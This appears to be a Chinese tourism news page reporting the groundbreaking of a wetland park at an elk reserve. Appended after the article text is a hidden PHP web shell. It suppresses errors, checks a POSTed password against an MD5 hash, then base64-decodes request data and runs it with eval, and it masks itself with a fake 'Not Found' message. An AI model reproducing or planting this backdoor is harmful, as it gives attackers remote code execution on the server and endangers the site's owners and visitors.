最新要闻

首页 > 最新要闻 >

    麋鹿保护区千亩湿地公园破土动工

    8月7日上午8时18分,麋鹿保护区千亩湿地公园正式破土动工。保护区管理处领导、景区领导及部分职工出席了动工仪式。

     

    千亩湿地公园于一年前开始筹建,用以展示麋鹿保护区特有的湿地文化、麋鹿文化和封神文化,此次破土动工的为道路和桥梁项目。千亩湿地公园将是麋鹿保护区发展史上又一座里程碑,景区周边业态的不断丰富,景区自身的不断发展和强化管理,将会持续带给游客们不一样的旅游体验。待到千亩湿地公园建成之日,中华麋鹿园景区将以全新的姿态面向广大游客,也会吸引的更多的人前来游玩观赏,驻足眺望,饱览湿地之美、麋鹿之韵。

     

    千亩湿地公园将成为湿地保护的良好示范区,成为传播麋鹿文化的又一佳地。同时,这也带动了周边乡镇的经济发展,为打造全域旅游贡献了一份力量。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>